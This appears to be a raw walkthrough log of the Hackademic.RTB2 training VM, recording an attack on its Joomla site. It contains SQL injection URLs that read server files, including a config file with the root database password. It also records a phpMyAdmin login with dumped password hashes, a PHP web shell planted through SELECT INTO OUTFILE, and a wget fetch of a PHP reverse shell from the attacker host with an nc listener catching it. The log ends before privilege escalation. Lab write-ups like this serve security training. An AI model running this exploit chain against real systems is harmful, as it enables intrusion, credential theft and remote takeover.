        Order allow,deny
        allow from all
   

    ScriptAlias /cgi-bin/ /usr/lib/cgi-bin/
   
        AllowOverride None
        Options +ExecCGI -MultiViews +SymLinksIfOwnerMatch
        Order allow,deny
        Allow from all
   

    ErrorLog /var/log/apache2/error.log

    # Possible values include: debug, info, notice, warn, error, crit,
    # alert, emerg.
    LogLevel warn

    CustomLog /var/log/apache2/access.log combined

    Alias /doc/ "/usr/share/doc/"
   
        Options Indexes MultiViews FollowSymLinks
        AllowOverride None
        Order deny,allow
        Deny from all
        Allow from 127.0.0.0/255.0.0.0 ::1/128
   



http://192.168.56.105:666/index.php?option=com_amblog&view=amblog&catid=-1%20UNION%20SELECT%20load_file%28%27/var/www/welcome/check.php%27%29
  <?php
$pass_answer = "' or 1=1--'";
$pass_answer_2 = "' OR 1=1--'";

if($_POST['password'] == $pass_answer or $_POST['password'] == $pass_answer_2){
    echo '<h2>';
    echo 'Ok, nice shot...';
    echo '<br>';
    echo '</h2>';
    echo '...but, you are looking in a wrong place bro! ;-)';
    echo '<br>';
    echo '<br>';
    echo '<font color="black">';
    echo '%33%63%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%33%65%20%30%64%20%30%61%20%34%62%20%36%65%20%36%66%20%36%33%20%36%62%20%32%30%20%34%62%20%36%65%20%36%66%20%36%33%20%36%62%20%32%30%20%34%62%20%36%65%20%36%66%20%36%33%20%36%62%20%36%39%20%36%65%20%32%37%20%32%30%20%36%66%20%36%65%20%32%30%20%36%38%20%36%35%20%36%31%20%37%36%20%36%35%20%36%65%20%32%37%20%37%33%20%32%30%20%36%34%20%36%66%20%36%66%20%37%32%20%32%30%20%32%65%20%32%65%20%32%30%20%33%61%20%32%39%20%30%64%20%30%61%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%30%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%30%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%31%20%33%30%20%33%31%20%33%30%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%30%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%31%20%33%30%20%33%31%20%33%30%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%30%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%31%20%33%30%20%33%31%20%33%30%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%30%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%30%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%30%64%20%30%61%20%33%63%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%33%65%0A';
    echo '</font color="black">';

}

else{
    echo '<h2>';
    echo 'You are trying to login with wrong credentials!';
    echo '<br>';
    echo '</h2>';
    echo "Please try again...";
}
?>

URL decode :

3c 2d 2d 2d 2d 2d 2d 2d 2d 2d 3e 0d 0a 4b 6e 6f 63 6b 20 4b 6e 6f 63 6b 20 4b 6e 6f 63 6b 69 6e 27 20 6f 6e 20 68 65 61 76 65 6e 27 73 20 64 6f 6f 72 20 2e 2e 20 3a 29 0d 0a 30 30 31 31 30 30 30 31 20 30 30 31 31 30 30 30 30 20 30 30 31 31 30 30 30 30 20 30 30 31 31 30 30 30 31 20 30 30 31 31 31 30 31 30 20 30 30 31 31 30 30 30 31 20 30 30 31 31 30 30 30 31 20 30 30 31 31 30 30 30 30 20 30 30 31 31 30 30 30 31 20 30 30 31 31 31 30 31 30 20 30 30 31 31 30 30 30 31 20 30 30 31 31 30 30 30 30 20 30 30 31 31 30 30 30 31 20 30 30 31 31 30 30 30 31 20 30 30 31 31 31 30 31 30 20 30 30 31 31 30 30 30 31 20 30 30 31 31 30 30 30 30 20 30 30 31 31 30 30 30 30 20 30 30 31 31 30 30 30 31 0d 0a 3c 2d 2d 2d 2d 2d 2d 2d 2d 2d 3e

Hexa to asci :

<--------->
Knock Knock Knockin' on heaven's door .. :)
00110001 00110000 00110000 00110001 00111010 00110001 00110001 00110000 00110001 00111010 00110001 00110000 00110001 00110001 00111010 00110001 00110000 00110000 00110001
<--------->?

bin to asci:

1 0 0 1 : 1 1 0 1 : 1 0 1 1 : 1 0 0 1

binary to hex:

313030313A3131

binary to decimal

9:13:11:9

decimal to hex

9:D:B:9

I dunno what is this..... ?????

http://192.168.56.105:666/index.php?option=com_amblog&view=amblog&catid=-1%20UNION%20SELECT%20load_file%28%27/var/www/index.php%27%29

<?php
/**
* @version        $Id: index.php 14401 2010-01-26 14:10:00Z louis $
* @package        Joomla
* @copyright    Copyright (C) 2005 - 2010 Open Source Matters. All rights reserved.
* @license        GNU/GPL, see LICENSE.php
* Joomla! is free software. This version may have been modified pursuant
* to the GNU General Public License, and as distributed it includes or
* is derivative of works licensed under the GNU General Public License or
* other free or open source software licenses.
* See COPYRIGHT.php for copyright notices and details.
*/

// Set flag that this is a parent file
define( '_JEXEC', 1 );

define('JPATH_BASE', dirname(__FILE__) );

define( 'DS', DIRECTORY_SEPARATOR );

require_once ( JPATH_BASE .DS.'includes'.DS.'defines.php' );
require_once ( JPATH_BASE .DS.'includes'.DS.'framework.php' );

JDEBUG ? $_PROFILER->mark( 'afterLoad' ) : null;

/**
 * CREATE THE APPLICATION
 *
 * NOTE :
 */
$mainframe =& JFactory::getApplication('site');

/**
 * INITIALISE THE APPLICATION
 *
 * NOTE :
 */
// set the language
$mainframe->initialise();

JPluginHelper::importPlugin('system');

// trigger the onAfterInitialise events
JDEBUG ? $_PROFILER->mark('afterInitialise') : null;
$mainframe->triggerEvent('onAfterInitialise');

/**
 * ROUTE THE APPLICATION
 *
 * NOTE :
 */
$mainframe->route();

// authorization
$Itemid = JRequest::getInt( 'Itemid');
$mainframe->authorize($Itemid);

// trigger the onAfterRoute events
JDEBUG ? $_PROFILER->mark('afterRoute') : null;
$mainframe->triggerEvent('onAfterRoute');

/**
 * DISPATCH THE APPLICATION
 *
 * NOTE :
 */
$option = JRequest::getCmd('option');
$mainframe->dispatch($option);

// trigger the onAfterDispatch events
JDEBUG ? $_PROFILER->mark('afterDispatch') : null;
$mainframe->triggerEvent('onAfterDispatch');

/**
 * RENDER  THE APPLICATION
 *
 * NOTE :
 */
$mainframe->render();

// trigger the onAfterRender events
JDEBUG ? $_PROFILER->mark('afterRender') : null;
$mainframe->triggerEvent('onAfterRender');

/**
 * RETURN THE RESPONSE
 */
echo JResponse::toString($mainframe->getCfg('gzip'));

http://192.168.56.105:666/index.php?option=com_amblog&view=amblog&catid=-1%20UNION%20SELECT%20load_file%28%27/var/www/configuration.php%27%29

<?php
class JConfig {
/* Site Settings */
var $offline = '0';
var $offline_message = 'This site is down for maintenance.<br /> Please check back again soon.';
var $sitename = 'Hackademic.RTB2';
var $editor = 'tinymce';
var $list_limit = '20';
var $legacy = '0';
/* Debug Settings */
var $debug = '0';
var $debug_lang = '0';
/* Database Settings */
var $dbtype = 'mysql';
var $host = 'localhost';
var $user = 'root';
var $password = 'yUtJklM97W';
var $db = 'joomla';
var $dbprefix = 'jos_';
/* Server Settings */
var $live_site = '';
var $secret = 'iFzlVUCg9BBPoUDU';
var $gzip = '0';
var $error_reporting = '-1';
var $helpurl = 'http://help.joomla.org';
var $xmlrpc_server = '0';
var $ftp_host = '127.0.0.1';
var $ftp_port = '21';
var $ftp_user = '';
var $ftp_pass = '';
var $ftp_root = '';
var $ftp_enable = '0';
var $force_ssl = '0';
/* Locale Settings */
var $offset = '0';
var $offset_user = '0';
/* Mail Settings */
var $mailer = 'mail';
var $mailfrom = 'admin@hackademirtb2.com';
var $fromname = 'Hackademic.RTB2';
var $sendmail = '/usr/sbin/sendmail';
var $smtpauth = '0';
var $smtpsecure = 'none';
var $smtpport = '25';
var $smtpuser = '';
var $smtppass = '';
var $smtphost = 'localhost';
/* Cache Settings */
var $caching = '0';
var $cachetime = '15';
var $cache_handler = 'file';
/* Meta Settings */
var $MetaDesc = 'Joomla! - the dynamic portal engine and content management system';
var $MetaKeys = 'joomla, Joomla';
var $MetaTitle = '1';
var $MetaAuthor = '1';
/* SEO Settings */
var $sef           = '0';
var $sef_rewrite   = '0';
var $sef_suffix    = '0';
/* Feed Settings */
var $feed_limit   = 10;
var $feed_email   = 'author';
var $log_path = '/var/www/logs';
var $tmp_path = '/var/www/tmp';
/* Session Setting */
var $lifetime = '15';
var $session_handler = 'database';
}
?>

http://192.168.56.105/phpmyadmin

login: root / yUtJklM97W

http://192.168.56.105/phpmyadmin/index.php?db=joomla&token=1b7a1750b5f6d69cb6797631710e1959

jos_users Administrator Edit

pasword: test: be384a53bb01ae8acac1ea24dfdd065f:wpMwwAIdOLfdUbnSP9rhynCv0RLQvGQX

login Administrator / test
empty page...

http://192.168.56.105/phpmyadmin/sql.php?db=mysql&token=1b7a1750b5f6d69cb6797631710e1959&table=user&pos=0

localhost     root     *5D3C124406BF85494067182754131FF4DAB9C6C7
HackademicRTB2     root     *5D3C124406BF85494067182754131FF4DAB9C6C7    
127.0.0.1     root     *5D3C124406BF85494067182754131FF4DAB9C6C7     Y
localhost     debian-sys-maint     *F36E6519B0B1D62AA2D5346EFAD66D1CAF248996
localhost     phpmyadmin     *5D3C124406BF85494067182754131FF4DAB9C6C7

--------------

phpmyadmin SQL query

http://192.168.56.105/phpmyadmin/tbl_sql.php?db=mysql&table=user&token=6ad2011913439a1e1d387f7182dc1322

SELECT '<? system($_GET["c"]); ?>'
INTO OUTFILE "/var/www/evil.php"

http://192.168.56.105:666/evil.php?c=ls%20-al%20/var/www

total 288
drwxrwxrwx 19 p0wnbox  p0wnbox   4096 Nov 14 13:57 .
drwxr-xr-x 16 root     root      4096 Jan 17  2011 ..
-rw-rw-rw-  1 root     root     76539 Nov  3  2010 CHANGELOG.php
-rw-rw-rw-  1 root     root      1172 Jan 26  2010 COPYRIGHT.php
-rw-rw-rw-  1 root     root     14918 Nov  2  2010 CREDITS.php
-rw-rw-rw-  1 root     root      4344 Jan 26  2010 INSTALL.php
-rw-rw-rw-  1 root     root     17816 Jan 17  2009 LICENSE.php
-rw-rw-rw-  1 root     root     27986 Jan 26  2010 LICENSES.php
-rwxrwxrwx  1 root     root     21697 Jan 17  2011 Untitledt.png
drwxrwxrwx  7 root     root      4096 Nov  3  2010 _installation
drwxrwxrwx  2 root     root      4096 Jan 22  2011 administrator
drwxrwxrwx  2 root     root      4096 Nov  3  2010 cache
drwxrwxrwx 15 root     root      4096 Jan 22  2011 components
-rw-rw-rw-  1 www-data www-data  1793 Jan 17  2011 configuration.php
-rw-rw-rw-  1 root     root      3411 Jan 26  2010 configuration.php-dist
-rw-rw-rw-  1 mysql    mysql       26 Nov 14 13:57 evil.php
-rw-rw-rw-  1 root     root      2773 Jan 26  2010 htaccess.txt
drwxrwxrwx  6 root     root      4096 Nov  3  2010 images
drwxrwxrwx  8 root     root      4096 Nov  3  2010 includes
-rw-rw-rw-  1 root     root      2049 Jan 26  2010 index.php
-rw-rw-rw-  1 root     root       588 Jan 26  2010 index2.php
-rw-rw-rw-  1 mysql    mysql       20 Nov 14 13:55 info.php
drwxrwxrwx  4 root     root      4096 Nov  3  2010 language
drwxrwxrwx 16 root     root      4096 Nov  3  2010 libraries
drwxrwxrwx  2 root     root      4096 Nov  3  2010 logs
drwxrwxrwx  3 root     root      4096 Nov  3  2010 media
drwxrwxrwx 22 root     root      4096 Nov  3  2010 modules
drwxr-xr-x 11 root     root      4096 Jan 17  2011 pC4Hp8kt@Px8PgkV$!
drwxrwxrwx 11 root     root      4096 Nov  3  2010 plugins
-rw-rw-rw-  1 root     root       304 Aug  8  2006 robots.txt
drwxrwxrwx  7 root     root      4096 Jan 17  2011 templates
drwxrwxrwx  2 root     root      4096 Jan 22  2011 tmp
-rw-rw-rw-  1 mysql    mysql        0 Nov 13 18:25 tmpurwmd.php
-rw-rw-rw-  1 mysql    mysql        0 Nov 13 18:25 tmpuumnf.php
drwxrwxrwx  2 root     root      4096 Nov 14 11:57 welcome
drwxrwxrwx  4 root     root      4096 Nov  3  2010 xmlrpc
-rw-rw-rw-  1 root     root       177 Jan 17  2011 xxx.html

http://192.168.56.105:666/evil.php?c=which%20wget

/usr/bin/wget

192.168.56.105:666/evil.php?c=wget -O phpreverse.php http://192.168.56.101/phpshells/phpreverse.txt

root@kali:~# nc -l -v -p 1234
listening on [any] 1234 ...

http://192.168.56.105:666/phpreverse.php
192.168.56.105: inverse host lookup failed: Unknown server error : Connection timed out
connect to [192.168.56.101] from (UNKNOWN) [192.168.56.105] 59158
Linux HackademicRTB2 2.6.32-24-generic #39-Ubuntu SMP Wed Jul 28 06:07:29 UTC 2010 i686 GNU/Linux
 14:59:22 up 1 day,  5:10,  0 users,  load average: 0.01, 0.04, 0.01
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: can't access tty; job control turned off
$

Next step: Privilege escalation.